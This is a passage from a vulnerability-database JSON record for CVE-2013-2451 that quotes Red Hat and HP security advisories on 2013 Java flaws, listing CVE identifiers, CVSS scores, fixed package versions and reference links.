(2D, 8011257)\n975115 - CVE-2013-2463 OpenJDK: Incorrect image attribute verification (2D, 8012438)\n975118 - CVE-2013-2465 OpenJDK: Incorrect image channel verification (2D, 8012597)\n975120 - CVE-2013-2469 OpenJDK: Incorrect image layout verification (2D, 8012601)\n975121 - CVE-2013-2459 OpenJDK: Various AWT integer overflow checks (AWT, 8009071)\n975122 - CVE-2013-2460 OpenJDK: tracing insufficient access checks (Serviceability, 8010209)\n975124 - CVE-2013-2445 OpenJDK: Better handling of memory allocation errors (Hotspot, 7158805)\n975125 - CVE-2013-2448 OpenJDK: Better access restrictions (Sound, 8006328)\n975126 - CVE-2013-2461 OpenJDK: Missing check for valid DOMCanonicalizationMethod canonicalization algorithm (Libraries, 8014281)\n975127 - CVE-2013-2407 OpenJDK: Integrate Apache Santuario, rework class loader (Libraries, 6741606, 8008744)\n975129 - CVE-2013-2454 OpenJDK: SerialJavaObject package restriction (JDBC, 8009554)\n975130 - CVE-2013-2458 OpenJDK: Method handles (Libraries, 8009424)\n975131 - CVE-2013-2444 OpenJDK: Resource denial of service (AWT, 8001038)\n975132 - CVE-2013-2446 OpenJDK: output stream access restrictions (CORBA, 8000642)\n975133 - CVE-2013-2457 OpenJDK: Proper class checking (JMX, 8008120)\n975134 - CVE-2013-2453 OpenJDK: MBeanServer Introspector package access (JMX, 8008124)\n975137 - CVE-2013-2443 OpenJDK: AccessControlContext check order issue (Libraries, 8001330)\n975138 - CVE-2013-2452 OpenJDK: Unique VMIDs (Libraries, 8001033)\n975139 - CVE-2013-2455 OpenJDK: getEnclosing* checks (Libraries, 8007812)\n975140 - CVE-2013-2447 OpenJDK: Prevent revealing the local address (Networking, 8001318)\n975141 - CVE-2013-2450 OpenJDK: ObjectStreamClass circular reference denial of service (Serialization, 8000638)\n975142 - CVE-2013-2456 OpenJDK: ObjectOutputStream access checks (Serialization, 8008132)\n975144 - CVE-2013-2412 OpenJDK: JConsole SSL support (Serviceability, 8003703)\n975145 - CVE-2013-2449 OpenJDK: GnomeFileTypeDetector path access check (Libraries, 8004288)\n975146 - CVE-2013-2451 OpenJDK: exclusive port binding (Networking, 7170730)\n975148 - CVE-2013-1500 OpenJDK: Insecure shared memory permissions (2D, 8001034)\n975757 - CVE-2013-2464 Oracle JDK: unspecified vulnerability fixed in 7u25 (2D)\n975761 - CVE-2013-2468 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)\n975764 - CVE-2013-2466 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)\n975769 - CVE-2013-2462 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)\n975770 - CVE-2013-2442 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)\n975773 - CVE-2013-2437 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)\n975774 - CVE-2013-2400 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)\n975775 - CVE-2013-3744 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 5):\n\ni386:\njava-1.7.0-oracle-1.7.0.25-1jpp.1.el5_9.i386.rpm\njava-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el5_9.i386.rpm\njava-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el5_9.i386.rpm\njava-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el5_9.i386.rpm\njava-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el5_9.i386.rpm\njava-1.7.0-oracle-src-1.7.0.25-1jpp.1.el5_9.i386.rpm\n\nx86_64:\njava-1.7.0-oracle-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\njava-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\njava-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\njava-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\njava-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\njava-1.7.0-oracle-src-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 5):\n\ni386:\njava-1.7.0-oracle-1.7.0.25-1jpp.1.el5_9.i386.rpm\njava-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el5_9.i386.rpm\njava-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el5_9.i386.rpm\njava-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el5_9.i386.rpm\njava-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el5_9.i386.rpm\njava-1.7.0-oracle-src-1.7.0.25-1jpp.1.el5_9.i386.rpm\n\nx86_64:\njava-1.7.0-oracle-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\njava-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\njava-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\njava-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\njava-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\njava-1.7.0-oracle-src-1.7.0.25-1jpp.1.el5_9.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 6):\n\ni386:\njava-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.i686.rpm\n\nx86_64:\njava-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Supplementary (v. 6):\n\nx86_64:\njava-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 6):\n\ni386:\njava-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.i686.rpm\n\nx86_64:\njava-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Supplementary (v. 6):\n\ni386:\njava-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.i686.rpm\njava-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.i686.rpm\n\nx86_64:\njava-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\njava-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-1500.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1571.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2400.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2407.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2412.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2437.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2442.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2443.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2444.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2445.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2446.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2447.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2448.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2449.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2450.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2451.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2452.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2453.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2454.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2455.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2456.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2457.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2458.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2459.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2460.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2461.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2462.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2463.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2464.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2465.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2466.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2468.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2469.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2470.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2471.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2472.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2473.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-3744.html\nhttps://access.redhat.com/security/updates/classification/#critical\nhttp://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2013 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFRwxfSXlSAg2UNWIIRAtbuAJ9H6PHJcgqEan9vQtHjkUXl58kRpwCeI9sA\nJow4P90PK0jpYNzHe9siPmU=\n=GzWl\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c03874547\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c03874547\nVersion: 1\n\nHPSBUX02908 rev.1 - HP-UX Running Java6, Remote Unauthorized Access,\nDisclosure of Information, and Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2013-07-31\nLast Updated: 2013-07-31\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, and other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in the Java Runtime\nEnvironment (JRE) and the Java Developer Kit (JDK) running on HP-UX. These\nvulnerabilities could allow remote unauthorized access, disclosure of\ninformation, and other exploits. \nHP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.19 and\nearlier. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-1500 (AV:L/AC:L/Au:N/C:P/I:P/A:N) 3.6\nCVE-2013-1571 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2013-2407 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4\nCVE-2013-2412 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2433 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2013-2437 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2442 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2013-2444 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-2445 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\nCVE-2013-2446 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2447 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2013-2450 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-2451 (AV:L/AC:H/Au:N/C:P/I:P/A:P) 3.7\nCVE-2013-2452 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2453 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-2454 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2013-2455 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2456 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2457 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-2459 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2461 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2013-2463 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2464 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2465 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2466 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2468 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2469 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2470 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2471 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2473 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-3743 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following Java version upgrade to resolve these\nvulnerabilities. \n\nThe upgrade is available from the following location\n\nhttp://www.hp.com/java\n\nOS Version\n Release Version\n\nHP-UX B.11.11, B.11.23, B.11.31\n JDK and JRE v6.0.20 or subsequent\n\nMANUAL ACTIONS: Yes - Update\nFor Java v6.0 update to Java v6.0.20 or subsequent\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\nHP-UX B.11.23\n===========\nJdk60.JDK60-COM\nJdk60.JDK60-PA20\nJdk60.JDK60-PA20W\nJre60.JRE60-COM\nJre60.JRE60-COM-DOC\nJre60.JRE60-PA20\nJre60.JRE60-PA20-HS\nJre60.JRE60-PA20W\nJre60.JRE60-PA20W-HS\nJdk60.JDK60-IPF32\nJdk60.JDK60-IPF64\nJre60.JRE60-COM\nJre60.JRE60-IPF32\nJre60.JRE60-IPF32-HS\nJre60.JRE60-IPF64\nJre60.JRE60-IPF64-HS\naction: install revision 1.6.0.20.00 or subsequent\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk60.JDK60-COM\nJdk60.JDK60-IPF32\nJdk60.JDK60-IPF64\nJre60.JRE60-IPF32\nJre60.JRE60-IPF32-HS\nJre60.JRE60-IPF64\nJre60.JRE60-IPF64-HS\nJre60.JRE60-COM\nJre60.JRE60-IPF32\nJre60.JRE60-IPF32-HS\nJre60.JRE60-IPF64\nJre60.JRE60-IPF64-HS\naction: install revision 1.6.0.20.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 31 July 2013 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2013 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits;damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners", "sources": [ { "db": "NVD", "id": "CVE-2013-2451" }, { "db": "BID", "id": "60625" }, { "db": "PACKETSTORM", "id": "122551" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "122405" }, { "db": "PACKETSTORM", "id": "122075" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122109" }, { "db": "PACKETSTORM", "id": "122653" }, { "db": "PACKETSTORM", "id": "122404" } ], "trust": 1.98 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-2451", "trust": 2.8 }, { "db": "BID", "id": "60625", "trust": 1.9 }, { "db": "USCERT", "id": "TA13-169A", "trust": 1.6 }, { "db": "SECUNIA", "id": "54154", "trust": 1.6 }, { "db": "CNNVD", "id": "CNNVD-201306-307", "trust": 0.6 }, { "db": "HITACHI", "id": "HS13-015", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-213-02", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "PACKETSTORM", "id": "122551", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127267", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122405", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122075", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126195", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122109", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122653", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122404", "trust": 0.1 } ], "sources": [ { "db": "BID", "id": "60625" }, { "db": "PACKETSTORM", "id": "122551" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "122405" }, { "db": "PACKETSTORM", "id": "122075" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122109" }, { "db": "PACKETSTORM", "id": "122653" }, { "db": "PACKETSTORM", "id": "122404" }, { "db": "CNNVD", "id": "CNNVD-201306-307" }, { "db": "NVD", "id": "CVE-2013-2451" } ] }, "id": "VAR-201306-0250", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 1.0 }, "last_update_date": "2024-07-23T20:05:01.335000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "jre-7u25-linux-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46256" }, { "title": "jre-7u25-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46260" }, { "title": "jre-7u25-solaris-sparcv9", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46264" }, { "title": "jre-7u25-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46268" }, { "title": "jre-7u25-linux-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46255" }, { "title": "jre-7u25-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46259" }, { "title": "jre-7u25-solaris-sparc", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46263" }, { "title": "jre-7u25-windows-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46267" }, { "title": "jre-7u25-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46258" }, { "title": "jre-7u25-solaris-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46262" }, { "title": "jre-7u25-windows-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46266" }, { "title": "jre-7u25-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46257" }, { "title": "jre-7u25-solaris-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46261" }, { "title": "jre-7u25-windows-i586-iftw", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46265" }, { "title": "jre-7u25-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46269" } ], "sources": [ { "db": "CNNVD", "id": "CNNVD-201306-307" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2013-2451" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21642336" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1060.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1456.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-0963.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1059.html" }, { "trust": 1.6, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19535" }, { "trust": 1.6, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a17265" }, { "trust": 1.6, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00003.html" }, { "trust": 1.6, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 1.6, "url": "http://www.us-cert.gov/ncas/alerts/ta13-169a" }, { "trust": 1.6, "url": "http://rhn.redhat.com/errata/rhsa-2013-1455.html" }, { "trust": 1.6, "url": "http://secunia.com/advisories/54154" }, { "trust": 1.6, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00026.html" }, { "trust": 1.6, "url": "http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/8dd8266a2f4b" }, { "trust": 1.6, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00028.html" }, { "trust": 1.6, "url": "http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=975146" }, { "trust": 1.6, "url": "http://www.securityfocus.com/bid/60625" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=137545592101387\u0026w=2" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2453" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2456" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2455" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2457" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2407" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2447" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1500" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2452" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2459" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1571" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2463" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2448" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2446" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2451" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2444" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2450" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2412" }, { "trust": 0.6, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21650778" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2465" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2442" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2437" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2454" }, { "trust": 0.5, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 